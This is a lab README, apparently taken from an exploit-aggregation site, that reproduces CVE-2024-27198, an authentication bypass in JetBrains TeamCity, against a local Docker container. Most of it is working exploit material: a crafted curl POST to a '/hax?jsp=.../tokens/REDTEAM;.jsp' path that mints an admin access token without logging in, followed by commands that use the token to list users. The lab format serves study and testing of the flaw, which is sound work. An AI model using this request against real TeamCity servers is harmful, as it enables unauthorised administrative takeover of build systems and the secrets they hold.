Share
## https://sploitus.com/exploit?id=05DFD629-3F18-5D72-86FF-7FAE1B2B58D2
# CVE-2024-27198 Lab

## Description
TeamCity provides an admin-only page for token management that is not protected by authentication. This allows an unauthenticated user to generate an access token for the admin user if they can find an ID of an existing user.

### CVE Details
- CVE ID: CVE-2024-27198
- CWE: [CWE-288](https://cwe.mitre.org/data/definitions/288.html)
- CNA: JetBrains s.r.o.
- Base Score: 9.8 CRITICAL
- Vector:
  - CVSS:3.1
  - AV:N 	Network
  - AC:L 	Low
  - PR:N 	None
  - UI:N 	None
  - S:U 	Unchanged
  - C:H 	High
  - I:H 	High
  - A:H 	High


## Steps to reproduce
### Start the container
```sh
cd CVE-2024-27198
```
```sh
docker compose -f docker-compose.yml up -d
```

Access the vulnerable Teamcity instance at [http://localhost:8111](http://localhost:8111).



### Login Portal
Username:
```sh
admin
```

Password:
```sh
admin
```



### Test the security system
GET request for a resource without authentication:
```sh
curl -i http://localhost:8111/app/rest/users
```
Should return a "Authentication required" error with a 401 status code.



### Generate a token for admin user
```sh
curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8111/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'
```

Should return a token like this (The token is different every time):
```sh
eyJ0eXAiOiAiVENWMiJ9.T1AzMHJjY3piNC1QWDlFenpnLXdCUkRuSF84.ZmJlODg3ZDQtNjFmYy00ZGQxLTk2MDAtYmJlYjViZjE4NGFi
```



### Verify token
```sh
curl -i -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.NHBOT0RpYkVUdXJ2RHEyRXByUDJpVXBxZnBZ.ODQ4ZmQzYWQtMzUxYS00ZDkwLTllMTMtY2JhNjZmODI4MmY4" \
  http://localhost:8111/app/rest/users
```
Should return the list of users.



### Delete the token
1. Go to http://localhost:8111 with admin account.
2. Click on the profile icon on the top right.
3. Go to Profile -> Access Tokens.
4. You will see the "REDTEAM" token.
5. Simply click Delete next to the token.


### Stop the container
```sh
docker compose -f docker-compose.yml down
```

## Links
- [CVE-2024-27198](https://nvd.nist.gov/vuln/detail/cve-2024-27198)